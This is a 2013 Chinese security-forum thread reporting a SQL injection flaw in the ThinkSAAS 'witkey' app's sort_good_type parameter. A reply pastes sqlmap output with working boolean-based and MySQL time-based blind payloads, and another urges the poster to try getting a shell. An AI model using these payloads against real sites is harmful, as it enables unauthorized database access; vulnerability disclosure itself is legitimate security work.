thinksaas

2013-04-08 13:37:07 21 Rices 4339

http://xxxxxxxxxxxxx/index.php?app=witkey&ac=index&sort_industry=&sort_good_type=2[sql]

over

类别 Web安全

关于作者

Rices154篇文章2133篇回复

评论21次

要评论？请先登录或注册

21楼

hang333
2013-4-12 14:48

楼主试试看拿Shell～～

回复|@ta|踩(0)|顶(0)
20楼

a1258771
2013-4-9 19:47

撸主。。。求求求。。。。。。。。。

回复|@ta|踩(0)|顶(0)
19楼

xiaopeng
2013-4-9 19:22

楼主头像才是亮点，，哈哈

回复|@ta|踩(0)|顶(0)
18楼

biying
2013-4-9 15:47

回复|@ta|踩(0)|顶(0)
17楼

kimdle
2013-4-9 14:04

LZ好样的！！！

回复|@ta|踩(0)|顶(0)

16楼

Rank: 1

2013-4-9 11:16

sqlmap跑了下

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: sort_good_type     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND 7672=7672&sort_day=&sort_price=&sort_addtime=      Type: AND/OR time-based blind     Title: MySQL > 5.0.11 AND time-based blind     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND SLEEP(5)&sort_day=&sort_price=&sort_addtime= ---

回复|@ta|踩(0)|顶(0)

15楼

H4xssck3r
2013-4-9 09:26

简单明了，GOOD

回复|@ta|踩(0)|顶(0)
14楼

csser
2013-4-9 00:02

最直接的0day

回复|@ta|踩(0)|顶(0)
13楼

l14of
2013-4-8 23:58

这个App官网米有。

回复|@ta|踩(0)|顶(0)
12楼

xuehei
2013-4-8 23:00

rices ~~~大牛牛~~一直关注着你·~·

回复|@ta|踩(0)|顶(0)
11楼

XiaoMie
2013-4-8 22:02

文章简洁明了甚是喜欢

回复|@ta|踩(0)|顶(0)
10楼

0xcodede
2013-4-8 20:03

这个很干脆

回复|@ta|踩(0)|顶(0)
9楼

飞云小哥哥
2013-4-8 18:10

撸主v5

回复|@ta|踩(0)|顶(0)
8楼

M3loee
2013-4-8 17:24

呆b

回复|@ta|踩(0)|顶(0)
7楼

牧童
2013-4-8 15:59

嘿，Rices大牛发火了，后果很严重~~~~~~~

回复|@ta|踩(0)|顶(0)
6楼

爱绱hack
2013-4-8 15:49

撸过咯！　顶起

回复|@ta|踩(0)|顶(0)
5楼

nowake
2013-4-8 15:22

挖洞比赛。。。

回复|@ta|踩(0)|顶(0)
4楼

package
2013-4-8 14:38

你惹到 Rices牛了

回复|@ta|踩(0)|顶(0)
3楼

Rices
2013-4-8 14:23

艹你爹.

回复|@ta|踩(0)|顶(0)
2楼

M3loee
2013-4-8 14:22

撸主对wy一往情深有木有，都用来做头像了

回复|@ta|踩(0)|顶(0)

热门文章

社会工程【喜庆2025征文】社会工程学之传承FancyPig

# 社会工程学之传承FancyPig##### 前言：FancyPig是什么？有人会 ...

2024-12-05 09:23:37 50 5636

安全资讯美国财政部因黑客指控对中国公司“Integrity Technology”实施制裁

路透社报道称，美国财政部3日(当地时间)对一家中国公司实施制裁 ...

2025-01-04 20:38:23 19 2287

安全资讯人工智能模型DeepSeek R1 存在安全漏洞

DeepSeek R1 是中国最新推出的人工智能模型，正在科技界掀起波澜 ...

2025-01-30 05:52:05 6 1263

渗透测试【喜庆2025征文】一个Clickfix钓鱼网址行为分析

一、攻击主要特征模拟如 Google Meet 或 reCaptcha 等常用服务， ...

2025-01-16 21:31:52 11 1114

精华推荐

渗透测试【保姆级教学】某金融app FRIDA hook加解密算法+jsrpc=乱杀

## 0x01 APP渗透测试因为是经过授权的测试，所以拿到的这个包是 ...

2023-03-16 19:10:08 88 25331

渗透测试开发PasswordsPro模块破解自定义算法hash

现在破解hash一般都是用GPU工具了，但是我的硬盘里还保留着唯一 ...

2014-04-04 12:19:56 33 775

渗透测试渗透oracle11g

我曾经在90sec论坛里发过这两篇文章，目测t00ls里关于oracle攻防 ...

2013-07-20 12:32:23 55 17065

渗透测试内网渗透之PC控制及完美过杀毒!!!

一、PC控制篇在内网渗透的过程中,我们为了达到目标的长期控制,常 ...

2015-04-20 10:13:26 79 15666

渗透测试实战教你怎么拿到女神的手机号，渗透某偷红包app

最近在工地找了份稳定的工作，一个月努力点能赚个七八千吧，还是 ...

2017-05-16 19:19:17 104 3364

Top ↑